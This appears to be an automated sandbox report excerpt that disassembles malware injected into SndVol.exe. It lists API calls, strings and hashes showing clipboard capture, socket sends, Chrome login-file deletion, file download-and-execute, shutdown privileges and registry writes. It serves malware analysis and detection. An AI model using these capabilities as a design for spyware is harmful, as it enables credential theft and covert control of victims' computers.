                                                                        • Instruction Fuzzy Hash: 4A319572604348BFD700DBA1DC44FDBB7ECFB48744F40082AB645961A4D7B5EA49DB92
                                                                        Function 2914697B Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenClipboard.USER32 ref: 2914697C
                                                                        • EmptyClipboard.USER32 ref: 2914698A
                                                                        • CloseClipboard.USER32 ref: 29146990
                                                                        • OpenClipboard.USER32 ref: 29146997
                                                                        • GetClipboardData.USER32(0000000D), ref: 291469A7
                                                                        • GlobalLock.KERNEL32(00000000), ref: 291469B0
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 291469B9
                                                                        • CloseClipboard.USER32 ref: 291469BF
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                        • String ID:
                                                                        • API String ID: 2172192267-0
                                                                        • Opcode ID: a4612d6b181f356aab7b01539941fd3bf3295bae72ac9258bdd552af9a914dd6
                                                                        • Instruction ID: 775f30bd9173c203487e4b260cd3e82909056161ea48b3d0b50497b75335f7c6
                                                                        • Opcode Fuzzy Hash: a4612d6b181f356aab7b01539941fd3bf3295bae72ac9258bdd552af9a914dd6
                                                                        • Instruction Fuzzy Hash: 84018031704244AFE754BB73DC4CAAE7BB8BF94715F80546DE907C20C8DF388A069651
                                                                        Function 29144005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 291440D8
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 291440E4
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 291442A5
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291442AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                        • API String ID: 2127411465-314212984
                                                                        • Opcode ID: e200a7659517eeb6d885e3b63478ba13dd0238df7762c8766724acd516aac0fa
                                                                        • Instruction ID: 464da17655a983e76d49fb8443999c0a5f3889b148efc702c5ab8d341d88bc38
                                                                        • Opcode Fuzzy Hash: e200a7659517eeb6d885e3b63478ba13dd0238df7762c8766724acd516aac0fa
                                                                        • Instruction Fuzzy Hash: C0B12432E0420076DA48F777DD56CAE36B85FB565CFC0A92CA416970E0EE219B0FC796
                                                                        Function 2913BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 2913BA89
                                                                        • GetLastError.KERNEL32 ref: 2913BA93
                                                                        Strings
                                                                        • UserProfile, xrefs: 2913BA59
                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 2913BAB9
                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 2913BA54
                                                                        • [Chrome StoredLogins not found], xrefs: 2913BAAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteErrorFileLast
                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                        • API String ID: 2018770650-1062637481
                                                                        • Opcode ID: 6705455b2d3b74b4db61d64c41cf63043da19a50c800764888794bdbfa89a3e5
                                                                        • Instruction ID: 68c79fe71b9831a43914e3d3bae40dc8ba05480518e1a2af372bb411b377f375
                                                                        • Opcode Fuzzy Hash: 6705455b2d3b74b4db61d64c41cf63043da19a50c800764888794bdbfa89a3e5
                                                                        • Instruction Fuzzy Hash: 2601D631EA00097A6B48B7B7DC568FD7738AF3118CBC05519E40253198FE119B4B87E6
                                                                        Function 2914798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 2914799A
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 291479A1
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 291479B3
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 291479D2
                                                                        • GetLastError.KERNEL32 ref: 291479D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 3534403312-3733053543
                                                                        • Opcode ID: 2c6d6feddd77edc6c84f36ed472ab6f0883e4c105e8381997b1c21fb3851c8ce
                                                                        • Instruction ID: 187ce13ad1a4bee1fe7c6d8cf70848a2f8fe9eb545c74dfec5db336931d1293d
                                                                        • Opcode Fuzzy Hash: 2c6d6feddd77edc6c84f36ed472ab6f0883e4c105e8381997b1c21fb3851c8ce
                                                                        • Instruction Fuzzy Hash: 75F0DA7190216DABEB10ABA6ED4DAEF7FBCFF05315F114054B905A1144D6384A04DBF1
                                                                        Function 2913928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 29139293
                                                                          • Part of subcall function 291348C8: connect.WS2_32(?,?,?), ref: 291348E0
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 2913932F
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 2913938D
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 291393E5
                                                                        • FindClose.KERNEL32(00000000), ref: 291393FC
                                                                          • Part of subcall function 29134E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E38
                                                                          • Part of subcall function 29134E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E43
                                                                          • Part of subcall function 29134E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E4C
                                                                        • FindClose.KERNEL32(00000000), ref: 291395F4
                                                                          • Part of subcall function 29134AA1: WaitForSingleObject.KERNEL32(?,00000000,2913547D,?,?,00000004,?,?,00000004,?,291A4EF8,?), ref: 29134B47
                                                                          • Part of subcall function 29134AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,291A4EF8,?,?,?,?,?,?,2913547D), ref: 29134B75
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                        • String ID:
                                                                        • API String ID: 1824512719-0
                                                                        • Opcode ID: a7852d9669da3d4549491d971deee8bf6691819c06fd6666b93cd3ebd8c84656
                                                                        • Instruction ID: e5ce3721cde24c5f6019d096ea2ec4cad4491cfa4efc746cee9f1be9155f20d2
                                                                        • Opcode Fuzzy Hash: a7852d9669da3d4549491d971deee8bf6691819c06fd6666b93cd3ebd8c84656
                                                                        • Instruction Fuzzy Hash: 96B1B571900108EBDB48EBA2DD91EED7379AF24318FD09159D906A70D4EF34AB4ACB58
                                                                        Function 291467EF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2914798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 2914799A
                                                                          • Part of subcall function 2914798D: OpenProcessToken.ADVAPI32(00000000), ref: 291479A1
                                                                          • Part of subcall function 2914798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 291479B3
                                                                          • Part of subcall function 2914798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 291479D2
                                                                          • Part of subcall function 2914798D: GetLastError.KERNEL32 ref: 291479D8
                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 29146891
                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 291468A6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291468AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                        • String ID: PowrProf.dll$SetSuspendState
                                                                        • API String ID: 1589313981-1420736420
                                                                        • Opcode ID: 12006aaa16b6d3a2a682f1169f28ccf5267181f29f9933811c48578c6564dd85
                                                                        • Instruction ID: 747f29489f885ae5dbb1fc77242a25a8a0a44578372584a4d47336f86522446c
                                                                        • Opcode Fuzzy Hash: 12006aaa16b6d3a2a682f1169f28ccf5267181f29f9933811c48578c6564dd85
                                                                        • Instruction Fuzzy Hash: 8021D760B0434176EF88EBB38C9497E27695FB568CFC0AC386115570C8DE358B0BC366
                                                                        Function 291824BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,291827DB,?,00000000), ref: 29182555
                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,291827DB,?,00000000), ref: 2918257E
                                                                        • GetACP.KERNEL32(?,?,291827DB,?,00000000), ref: 29182593
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 2299586839-711371036
                                                                        • Opcode ID: e2b4010544dc8b4a8797dfc5327a788394b4e8f48f36e0ce6f5889b900241f3f
                                                                        • Instruction ID: 64a1d2eade52a622c37765f383986d2dc984079a4b03097035c2123eb093530b
                                                                        • Opcode Fuzzy Hash: e2b4010544dc8b4a8797dfc5327a788394b4e8f48f36e0ce6f5889b900241f3f
                                                                        • Instruction Fuzzy Hash: BD21E562B80104A6F32E8B17D815ACB73A6FF44FE8B424C55E909D7115E732CF42EB90
                                                                        Function 2914B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 2914B54A
                                                                        • LoadResource.KERNEL32(00000000,?,?,2913F419,00000000), ref: 2914B55E
                                                                        • LockResource.KERNEL32(00000000,?,?,2913F419,00000000), ref: 2914B565
                                                                        • SizeofResource.KERNEL32(00000000,?,?,2913F419,00000000), ref: 2914B574
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID: SETTINGS
                                                                        • API String ID: 3473537107-594951305
                                                                        • Opcode ID: 1344ffd29ee448fdce5b73dc3ce527f05f09df0c34cd88e2f55670c371318338
                                                                        • Instruction ID: 0f3c17b007e9d5293ba8d460448744fcf633e2be0f15fc456c12ebd1738186c3
                                                                        • Opcode Fuzzy Hash: 1344ffd29ee448fdce5b73dc3ce527f05f09df0c34cd88e2f55670c371318338
                                                                        • Instruction Fuzzy Hash: 6CE01275700298BBEB152B63EC4CD863E26F7C97627110454F5029661DC6398800E710
                                                                        Function 291396A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 291396A5
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 2913971D
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 29139746
                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 2913975D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                        • String ID:
                                                                        • API String ID: 1157919129-0
                                                                        • Opcode ID: 2ecb34832f493248ded63494f22c883f8887e4dde2434c7240234d838278a3a6
                                                                        • Instruction ID: d93c311318f8f2d688475c101bfa78b6d9ef54fc2db40da3a555ff551b647139
                                                                        • Opcode Fuzzy Hash: 2ecb34832f493248ded63494f22c883f8887e4dde2434c7240234d838278a3a6
                                                                        • Instruction Fuzzy Hash: F1815532900018EBDB49EBA2DC90DED777CBF24258F90916AD416A7094FF306B4BCB54
                                                                        Function 29182690 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 29178295: GetLastError.KERNEL32(00000020,?,2916A875,?,?,?,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B), ref: 29178299
                                                                          • Part of subcall function 29178295: _free.LIBCMT ref: 291782CC
                                                                          • Part of subcall function 29178295: SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 2917830D
                                                                          • Part of subcall function 29178295: _abort.LIBCMT ref: 29178313
                                                                          • Part of subcall function 29178295: _free.LIBCMT ref: 291782F4
                                                                          • Part of subcall function 29178295: SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 29178301
                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 2918279C
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 291827F7
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 29182806
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,29174AED,00000040,?,29174C0D,00000055,00000000,?,?,00000055,00000000), ref: 2918284E
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,29174B6D,00000040), ref: 2918286D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                        • String ID:
                                                                        • API String ID: 745075371-0
                                                                        • Opcode ID: de0dcdf965bd798db45a5074c59fd03d770f978bca2fbea2ee8e601dc6be17b8
                                                                        • Instruction ID: 022e16a65a0890c912d0a07143a1d3fda2df3000d33f449e7af80f34204783ee
                                                                        • Opcode Fuzzy Hash: de0dcdf965bd798db45a5074c59fd03d770f978bca2fbea2ee8e601dc6be17b8
                                                                        • Instruction Fuzzy Hash: 29514171E00209ABFB19DBA7CC84AFA73B8BF24784F414865EA14E7150D7749B42EF61
                                                                        Function 29138847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 2913884C
                                                                        • FindFirstFileW.KERNEL32(00000000,?,29196618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29138905
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 2913892D
                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 2913893A
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29138A50
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                        • String ID:
                                                                        • API String ID: 1771804793-0
                                                                        • Opcode ID: c93058240d42ff8d51eae3c6c30fb01b8726242e642a4a99c8fb69f3ec54915f
                                                                        • Instruction ID: d4fabcff4671103e274e1a5f44be2e0ad774e514a9c19e3f5975ca08cdd9a667
                                                                        • Opcode Fuzzy Hash: c93058240d42ff8d51eae3c6c30fb01b8726242e642a4a99c8fb69f3ec54915f
                                                                        • Instruction Fuzzy Hash: 32519532900108BADF48FB76DD959ED777CAF20248FD09159A806A7094EF34AB0FCB95
                                                                        Function 291793E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,2918F244), ref: 2917944F
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,291A2764,000000FF,00000000,0000003F,00000000,?,?), ref: 291794C7
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,291A27B8,000000FF,?,0000003F,00000000,?), ref: 291794F4
                                                                        • _free.LIBCMT ref: 2917943D
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 29179609
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                        • String ID:
                                                                        • API String ID: 1286116820-0
                                                                        • Opcode ID: 10a0ee1a800f502b65a14b97f3b5d9da3bdc4186bb66b3e93b5e107ca1e69d55
                                                                        • Instruction ID: de1561189053d54680d1e5adc1929e998dd051791a01630241b5e61e7d735c8c
                                                                        • Opcode Fuzzy Hash: 10a0ee1a800f502b65a14b97f3b5d9da3bdc4186bb66b3e93b5e107ca1e69d55
                                                                        • Instruction Fuzzy Hash: 1351E971E0035AABC704EFABDD80CEAB7B8EF58368B10469AE51497184E7349F47CB50
                                                                        Function 29136EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 29136FF7
                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 291370DB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DownloadExecuteFileShell
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$open
                                                                        • API String ID: 2825088817-1291576107
                                                                        • Opcode ID: 17e5c80fc25ae2c8a40b4e411ba4bc70cf9403815991958bd412077dff2b6eba
                                                                        • Instruction ID: f89a948bfc3be9ac10f9ebc4a90c8ab3315fa78f2d3e09292171931c3f581a56
                                                                        • Opcode Fuzzy Hash: 17e5c80fc25ae2c8a40b4e411ba4bc70cf9403815991958bd412077dff2b6eba
                                                                        • Instruction Fuzzy Hash: 08610932A1420077EB58EA77CC95DAE37B95FE155CFC0982CE442571C4EE209B0BC3AA
                                                                        Function 2914CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 2914CB68
                                                                          • Part of subcall function 291437AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 291437B9
                                                                          • Part of subcall function 291437AA: RegSetValueExA.KERNEL32(?,291974C8,00000000,?,00000000,00000000,291A52F0,?,?,2913F88E,291974C8,5.1.2 Pro), ref: 291437E1
                                                                          • Part of subcall function 291437AA: RegCloseKey.KERNEL32(?,?,?,2913F88E,291974C8,5.1.2 Pro), ref: 291437EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                        • API String ID: 4127273184-3576401099
                                                                        • Opcode ID: 79998e71983d6a3a3dddfa984d7126c6d79c14f61cb1ded76024d378bc01b470
                                                                        • Instruction ID: 1a264bf52f37245715f37a01d97541ea46d84a349a582ac743ddbc4b83b2827e
                                                                        • Opcode Fuzzy Hash: 79998e71983d6a3a3dddfa984d7126c6d79c14f61cb1ded76024d378bc01b470
                                                                        • Instruction Fuzzy Hash: 9511A462F9014073F848313B5D56F9D381283966EDFC2A518E6072A6C9D4834B1303E6
                                                                        Function 29181D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 29178295: GetLastError.KERNEL32(00000020,?,2916A875,?,?,?,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B), ref: 29178299
                                                                          • Part of subcall function 29178295: _free.LIBCMT ref: 291782CC
                                                                          • Part of subcall function 29178295: SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 2917830D
                                                                          • Part of subcall function 29178295: _abort.LIBCMT ref: 29178313
                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,29174AF4,?,?,?,?,2917454B,?,00000004), ref: 29181E3A
                                                                        • _wcschr.LIBVCRUNTIME ref: 29181ECA
                                                                        • _wcschr.LIBVCRUNTIME ref: 29181ED8
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,29174AF4,00000000,29174C14), ref: 29181F7B
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                        • String ID:
                                                                        • API String ID: 4212172061-0
                                                                        • Opcode ID: d08ef3629d79f3196150600a6de86323e263b58a6d5adbb9185000ea6ad77bcc
                                                                        • Instruction ID: c5e71a7694c2fea4d4b1056348f105da09659df88a1143baee9b063dd56d0078
                                                                        • Opcode Fuzzy Hash: d08ef3629d79f3196150600a6de86323e263b58a6d5adbb9185000ea6ad77bcc
                                                                        • Instruction Fuzzy Hash: A5610973A00606AAF7199B76CC85BF673A8FF05358F10456AEA05D7180EB70EB46DF60
                                                                        Function 2916BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 2916BC69
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 2916BC73
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 2916BC80
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: e9f50357e60613d0d8f2085f89551383506461181c71d9ad069b781c0d703358
                                                                        • Instruction ID: b1df93486746c93d756e79291e3c83d03fa7ba81f4e824decb05653bf85cc499
                                                                        • Opcode Fuzzy Hash: e9f50357e60613d0d8f2085f89551383506461181c71d9ad069b781c0d703358
                                                                        • Instruction Fuzzy Hash: B831E474D4121CABCB21DF25D9887CDB7B8BF18310F1041EAE81CA62A0EB709B918F44
                                                                        Function 29173355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,?,2917332B,?), ref: 29173376
                                                                        • TerminateProcess.KERNEL32(00000000,?,2917332B,?), ref: 2917337D
                                                                        • ExitProcess.KERNEL32 ref: 2917338F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: 037eee12565ca4f58f5c738f69a80b82af008256231fbe765418b464e0960a96
                                                                        • Instruction ID: 3353e111d3aa08eb34c5a38e49312b30d95cdd9dfa42fd5390513d7bbafb8e39
                                                                        • Opcode Fuzzy Hash: 037eee12565ca4f58f5c738f69a80b82af008256231fbe765418b464e0960a96
                                                                        • Instruction Fuzzy Hash: F9E04F3164024AEBCF556F16EE0CAC83B7AFF00355F004014F8054B121CB39DA43DBA0
                                                                        Function 29164BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,2916490B), ref: 29164BDD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 7469071c6ab269693bcda27afbecec6434787bf22f7cade7071649835077bc62
                                                                        • Instruction ID: 30060df6a62f29462b952bbf027fc564efa53f475d8bacf1b4092b8d4b1b9dec
                                                                        • Opcode Fuzzy Hash: 7469071c6ab269693bcda27afbecec6434787bf22f7cade7071649835077bc62
